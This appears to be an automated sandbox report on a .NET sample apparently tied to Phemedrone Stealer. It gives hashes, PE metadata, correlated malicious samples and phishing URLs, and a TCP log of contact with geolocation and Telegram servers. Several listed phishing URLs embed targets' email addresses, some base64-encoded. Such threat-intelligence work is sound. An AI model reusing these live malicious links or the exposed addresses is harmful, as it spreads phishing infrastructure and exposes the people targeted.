                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                            https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                              https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk%2E%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FBpORLlSyDHhQozoQ5XBZtBNm/dGhvbHplckByZGd1c2EuY29tGet hashmaliciousHTMLPhisher, Tycoon2FABrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                get.geojs.iorukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                • 172.67.70.233
                                                                                gCK3ozTL7Q.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                                • 172.67.70.233
                                                                                Activation.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                • 104.26.1.100
                                                                                ZOL2mIYAUH.exeGet hashmaliciousPhemedrone Stealer, PureLog Stealer, XWorm, zgRATBrowse
                                                                                • 104.26.0.100
                                                                                WDSecureUtilities(1).exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                • 104.26.1.100
                                                                                system.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                • 172.67.70.233
                                                                                B6EGeOHEFm.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                • 104.26.1.100
                                                                                Q60ZbERXWZ.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                • 104.26.1.100
                                                                                nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                • 104.26.1.100
                                                                                XCubQJqiz7.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                • 104.26.1.100
                                                                                api.telegram.orghttps://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                • 149.154.167.220
                                                                                Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 149.154.167.220

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                TELEGRAMRUhttps://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                • 149.154.167.220
                                                                                Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                CLOUDFLARENETUSSEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                • 172.67.179.207
                                                                                CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.158.81
                                                                                https://hongkongliving.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                • 104.18.33.8
                                                                                Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                                                • 104.17.25.14
                                                                                http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                                                • 172.67.26.92
                                                                                Mozi.m.elfGet hashmaliciousMiraiBrowse
                                                                                • 172.71.119.218
                                                                                EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                                                • 172.67.179.207
                                                                                EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                • 104.21.18.132
                                                                                https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04Get hashmaliciousUnknownBrowse
                                                                                • 104.16.117.116
                                                                                https://on-chainevm.pages.devGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.16.79.73

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                54328bd36c14bd82ddaa0c04b25ed9adfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 172.67.70.233
                                                                                Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 172.67.70.233
                                                                                REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.70.233
                                                                                Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 172.67.70.233
                                                                                HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 172.67.70.233
                                                                                ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 172.67.70.233
                                                                                fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 172.67.70.233
                                                                                New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 172.67.70.233
                                                                                Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 172.67.70.233
                                                                                ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                • 172.67.70.233
                                                                                3b5074b1b5d032e5620f69f9f700ff0eAclatis tool.exeGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                • 149.154.167.220
                                                                                751ietQPnX.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                • 149.154.167.220
                                                                                l92fYljXWF.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                • 149.154.167.220
                                                                                qxjDerXRGR.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                • 149.154.167.220
                                                                                taCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                • 149.154.167.220
                                                                                Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                9coWg6ayLz.msiGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Itaxyhi.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\Itaxyhi.exe
                                                                                File Type:CSV text
                                                                                Category:dropped
                                                                                Size (bytes):1498
                                                                                Entropy (8bit):5.364175471524945
                                                                                Encrypted:false
                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6Kha1qE4GIsCKIE4TKBGKoZAE4KKUNCsXE4NpYE4KD:MxHKQwYHKGSI6oa1qHGIsCtHTHhAHKKa
                                                                                MD5:595B106D256BBA6F8F3EE16C1CD7885C
                                                                                SHA1:32F022A507EAE88155D1B508EB469FE45F68775F
                                                                                SHA-256:1DFED58278EE4A79C88B9F481712749C1F1E3EE48EF043AC978CC958822FD000
                                                                                SHA-512:1CAE94F2D5B7C15E261491680593ACD9E7FC601851AF2BA108A2D3818CC5EB7A212D66E6060E9E792FAE611026F44A83C3D98E1D057D7E0E56F859584F539B2A
                                                                                Malicious:true
                                                                                Reputation:low
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):5.790452966007998
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:Itaxyhi.exe
                                                                                File size:119'296 bytes
                                                                                MD5:78c586522f986994aa77c466c9d678a8
                                                                                SHA1:4b9b13c3782ae532a140a33ba673dc65a37aa882
                                                                                SHA256:498ac6b747691eb456fc24ac26c3932effca9b46e39740963120f711e72aefc9
                                                                                SHA512:707ff5fcbb5e473583bec2d54aac25a3febe262c06025c9d88ddd5d30449b1454289eaa63bec848ca69147232474731052bef710e60c042d0c80e9c02486b5bb
                                                                                SSDEEP:1536:7DG01nFGLBQ+ZH3RSR9CJd6FLVTS6OSjl5eEJXopJ7xfYUCFkhTy3QFTiKCq:nFFFiMWJd6F5TnO65r+T1JQoTy3qTiY
                                                                                TLSH:A9C32A3C1AEB4D55E06F9AB7DBE9E4A9CAB5DAE34109F66A0C421ED30F16F408D03075
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0.............~.... ........@.. .......................@............@................................

                                                                                File Icon

                                                                                Icon Hash:00928e8e8686b000

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x41e77e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6686D59A [Thu Jul 4 17:02:18 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1e7240x57.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x200000x5c6.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x220000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x1c7840x1c8004ea16b0b7729f7cc26c4f3d24c843581False0.4702576754385965data5.828239901546038IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x200000x5c60x6002bb296f99167032983d146f7bcae15f2False0.4225260416666667data4.113059661922758IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x220000xc0x200bb06170c1607bceafbf9d9f9c10fc2bdFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_VERSION0x200a00x33cdata0.4251207729468599
                                                                                RT_MANIFEST0x203dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 11, 2024 07:31:57.662066936 CET49699443192.168.2.6172.67.70.233
                                                                                Dec 11, 2024 07:31:57.662131071 CET44349699172.67.70.233192.168.2.6
                                                                                Dec 11, 2024 07:31:57.662209988 CET49699443192.168.2.6172.67.70.233
                                                                                Dec 11, 2024 07:31:57.680428982 CET49699443192.168.2.6172.67.70.233
                                                                                Dec 11, 2024 07:31:57.680453062 CET44349699172.67.70.233192.168.2.6
                                                                                Dec 11, 2024 07:31:58.897412062 CET44349699172.67.70.233192.168.2.6
                                                                                Dec 11, 2024 07:31:58.897505045 CET49699443192.168.2.6172.67.70.233
                                                                                Dec 11, 2024 07:31:58.908967972 CET49699443192.168.2.6172.67.70.233
                                                                                Dec 11, 2024 07:31:58.908998013 CET44349699172.67.70.233192.168.2.6
                                                                                Dec 11, 2024 07:31:58.909318924 CET44349699172.67.70.233192.168.2.6
                                                                                Dec 11, 2024 07:31:58.952848911 CET49699443192.168.2.6172.67.70.233
                                                                                Dec 11, 2024 07:31:58.975317955 CET49699443192.168.2.6172.67.70.233
                                                                                Dec 11, 2024 07:31:59.019356012 CET44349699172.67.70.233192.168.2.6
                                                                                Dec 11, 2024 07:31:59.347460032 CET44349699172.67.70.233192.168.2.6
                                                                                Dec 11, 2024 07:31:59.350169897 CET44349699172.67.70.233192.168.2.6
                                                                                Dec 11, 2024 07:31:59.350224018 CET49699443192.168.2.6172.67.70.233
                                                                                Dec 11, 2024 07:31:59.354446888 CET49699443192.168.2.6172.67.70.233
                                                                                Dec 11, 2024 07:31:59.798181057 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:31:59.798240900 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:31:59.798305035 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:31:59.799210072 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:31:59.799222946 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.175126076 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.175323963 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.178441048 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.178459883 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.178781986 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.179657936 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.227329016 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.535242081 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.535284996 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.535393953 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.535418034 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.535542965 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.535671949 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.535715103 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.535720110 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.535809994 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.535814047 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.535928965 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.535943031 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.535962105 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.535967112 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.535984993 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.535989046 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536042929 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536060095 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536081076 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536092043 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536108971 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536115885 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536137104 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536147118 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536180973 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536190987 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536268950 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536277056 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536303997 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536310911 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536358118 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536367893 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536418915 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536431074 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536446095 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536451101 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536468029 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536475897 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536509991 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536598921 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536611080 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536634922 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536645889 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536686897 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536696911 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536715984 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536726952 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536772013 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536782026 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536814928 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536895037 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536904097 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536916018 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536926985 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536979914 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.536990881 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.536998987 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537003994 CET44349700149.154.167.220192.168.2.6
                                                                                Dec 11, 2024 07:32:01.537026882 CET49700443192.168.2.6149.154.167.220
                                                                                Dec 11, 2024 07:32:01.537035942 CET44349700149.154.167.220192.168.2.6
